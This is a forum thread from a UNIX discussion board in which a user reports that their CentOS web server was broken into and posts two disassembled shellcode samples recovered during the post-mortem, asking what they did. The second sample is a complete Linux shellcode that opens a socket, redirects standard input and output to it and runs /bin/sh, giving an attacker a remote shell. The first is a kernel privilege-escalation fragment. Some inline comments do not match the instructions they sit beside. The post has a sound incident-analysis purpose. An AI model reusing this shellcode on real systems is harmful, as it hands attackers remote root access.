seeking help from assembly and security gurus. my linux box was hacked!

Discussion in 'all things UNIX' started by jumalinuxguy, Nov 4, 2013.

Thread Status:
Not open for further replies.
  1. jumalinuxguy

    jumalinuxguy Registered Member

    Nov 4, 2013
    hello friends

    i run a personal web server that recently suffered an unfortunate break-in / hacking attempt. the server that was broken into is running CentOS 6.3 (old yes i know)

    i have already taken the server offline to limit further damage and penetration to my home network.

    recently, while attempting to do post-mortem analysis of the attacks which were used i find some shell code.

    please forgive me i am ignorant to most technical code (also my english still very bad). my work friend help me to decrypt these shell codes. he says they are assembly but i know very little about assembly language programming so i come here to ask you if these programs look bad to you?

    can some assembly guru here please tell me what these codes were used to do to my webserver ? i am pretty sure they broke into root account. and i have unplugged this machine so no more damage can be done.

    but still i would like to know HOW they did it, and what the assembly programs exploited. so that i can better protect my server in the future.

    thank you all much !!

    assembly codes below.

    program 1:
    .data:0x00000000 0f01f8 swapgs

    .data:0x00000003 e805000000 call func_0000000d

    .data:0x00000008 0f01f8 swapgs

    .data:0x0000000b 48 dec eax

    .data:0x0000000c cf iret

    program 2:
    .data:0x00000000 31c0 xor eax,eax

    .data:0x00000002 31db xor ebx,ebx

    .data:0x00000004 31c9 xor ecx,ecx

    .data:0x00000006 31d2 xor edx,edx

    .data:0x00000008 b066 mov al,0x66

    .data:0x0000000a b301 mov bl,0x1

    .data:0x0000000c 51 push ecx

    .data:0x0000000d 6a06 push 0x6
    ; char* dst = arg[0]
    .data:0x0000000f 6a01 push 0x1

    .data:0x00000011 6a02 push 0x2

    .data:0x00000013 89e1 mov ecx,esp

    .data:0x00000015 cd80 int 0x80

    .data:0x00000017 89c6 mov esi,eax

    .data:0x00000019 b066 mov al,0x66

    .data:0x0000001b 31db xor ebx,ebx
    ; while (c != 0)
    .data:0x0000001d b302 mov bl,0x2

    .data:0x0000001f 6866686653 push 0x53666866

    .data:0x00000024 fec3 inc bl

    .data:0x00000026 89e1 mov ecx,esp

    .data:0x00000028 6a10 push 0x10

    .data:0x0000002a 51 push ecx

    .data:0x0000002b 56 push esi

    .data:0x0000002c 89e1 mov ecx,esp

    .data:0x0000002e cd80 int 0x80

    .data:0x00000030 31c9 xor ecx,ecx

    .data:0x00000032 b103 mov cl,0x3

    .data:0x00000034 loc_00000034:
    ┏▶ .data:0x00000034 fec9 dec cl

    ┃ .data:0x00000036 b03f mov al,0x3f

    ┃ .data:0x00000038 cd80 int 0x80

    ┗ .data:0x0000003a 75f8 jne loc_00000034

    .data:0x0000003c 31c0 xor eax,eax

    .data:0x0000003e 52 push edx

    .data:0x0000003f 686e2f7368 push 0x68732f6e

    .data:0x00000044 682f2f6269 push 0x69622f2f

    .data:0x00000049 89e3 mov ebx,esp

    .data:0x0000004b 52 push edx

    .data:0x0000004c 53 push ebx

    .data:0x0000004d 89e1 mov ecx,esp

    .data:0x0000004f 52 push edx

    .data:0x00000050 89e2 mov edx,esp

    .data:0x00000052 b00b mov al,0xb

    .data:0x00000054 cd80 int 0x80

    thank you all and well wishes!
Thread Status:
Not open for further replies.